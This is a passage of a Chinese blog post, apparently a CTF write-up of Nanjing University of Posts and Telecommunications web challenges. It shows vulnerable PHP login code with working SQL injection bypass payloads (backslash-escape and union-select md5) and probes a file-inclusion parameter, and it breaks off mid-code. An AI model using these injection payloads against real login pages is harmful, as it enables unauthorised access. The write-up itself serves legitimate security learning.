南京邮电CTF 后面的几个WEB题目 By Assassinh

之前做的南邮的题目,但是一直遗留下来几个比较复杂一些的,但是前面还是有很有意思的题目,补题补题sql injection 4F12打开源码,关键代码如下#GOAL: login as admin,then get the flag;error_reporting(0);require 'db.inc.php';function clean($str){ if(get_magic_quot
摘要由CSDN通过智能技术生成

之前做的南邮的题目,但是一直遗留下来几个比较复杂一些的,但是前面还是有很有意思的题目,补题补题

sql injection 4

F12打开源码,关键代码如下

#GOAL: login as admin,then get the flag;
error_reporting(0);
require 'db.inc.php';

function clean($str){
   
    if(get_magic_quotes_gpc()){
        $str=stripslashes($str);
    }
    return htmlentities($str, ENT_QUOTES);
}

$username = @clean((string)$_GET['username']);
$password = @clean((string)$_GET['password']);

$query='SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';';
$result=mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
    die('Invalid password!');
}

echo $flag;

想办法构造闭合,用转义符\搞定构造万能钥匙

payload
http://chinalover.sinaapp.com/web15/index.php?username=admin\&password= or 1%23

坑爹的过滤了#号,需要一定运气才能试出来…

flag:nctf{sql_injection_is_interesting}

综合题

首先看到熟悉的东西

这里写图片描述

将之丢到google chrome 中的console中跑一下,得到一个网址

1bc29b36f623ba82aaf6724fd3b16718.php

访问这个网址发现说

这里写图片描述

猜测在它的header头部中,然后去找一下
这里写图片描述

根据提示我们看一下有没有 .bash_history发现有一个语句
这里写图片描述

按照文件名下载该文件,解压得到flag

nctf{bash_history_means_what}

SQL注入2

查看关键代码

<html>
<head>
Secure Web Login II
</head>
<body>

<?php
if($_POST[user] && $_POST[pass]) {
   mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $user = $_POST[user];
  $pass = md5($_POST[pass]);
  $query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));
  if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {
      echo "<p>Logged in! Key: ntcf{**************} </p>";
  }
  else {
    echo("<p>Log in failure!</p>");
  }
}
?>

都提示union 了,也知道sql语句,就是想办法让查到的东西可用嘛,构造如下

user=' union select md5(1)#'&pass=1

很容易就绕过了

ntcf{union_select_is_wtf} 

综合题2

当时没做出来的题目之一,比较综合吧
首先查看首页flag.php源码很快就能发现最下面有一个本CMS说明,是附带链接的,打开一看

这里写图片描述

首先是我们能得到一些信息,比如说admin的结构是

 create table admin ( id integer, username text, userpass text, ) 

还有存在的文件

flag.php
config.php
passencode.php
say.php
sm.txt
so.php

而且我们注意一下它的链接!http://cms.nuptzj.cn/about.php?file=sm.txt是不是非常像文件包含?尝试着看看能不能得到有用的信息吧!

//passencode.php
<?php 
function passencode($content){
    
    $pass=urlencode($content); 
    $array=str_split($content); 
    $pass=""; 
    for($i=0;$i<count($array);$i++){
        if($pass!=
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfweb题目"docker镜像"是指一个挑战题目,要求我们对一个Docker镜像进行分析和攻击。Docker是一种容器化技术,可以将应用、环境和关联的配置打包成一个独立的镜像。这个镜像可以在不同的环境中进行移植和运行。 对于这个ctfweb题目,我们可以首先通过命令"docker images"查看当前系统中的Docker镜像。然后,我们可以选择这个题目中的特定镜像进行分析,使用"docker inspect [镜像ID]"命令获取有关镜像的详细信息。 接下来,我们可以尝试在本地使用这个镜像来运行一个容器。可以使用"docker run [镜像ID]"命令创建一个新的容器实例,并根据题目给出的提示找出容器内的漏洞、文件、服务等信息。 从容器内部提取敏感信息的常见方法包括查找配置文件、访问数据库、分析日志文件等。另外,在容器中也可以进行一些命令执行、代码注入等漏洞利用操作,以获取更高的权限和更深入的信息。 此外,我们还可以使用一些常见的Docker安全工具,比如Docker Bench for Security、Clair、Trivy等来对容器进行漏洞扫描,识别潜在的安全问题,并找出可能存在的弱点。 当我们找到容器内的漏洞或弱点时,我们可以根据具体情况进行利用或编写脚本进行自动化攻击。在攻击过程中,我们应该遵循道德规范,不进行未授权的攻击行为。 总之,ctfweb题目"docker镜像"需要我们对Docker容器进行分析和攻击,通过理解镜像的构成和原理,掌握Docker相关的命令以及使用一些安全工具,我们可以更好地解决这个题目并获得相应的分数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值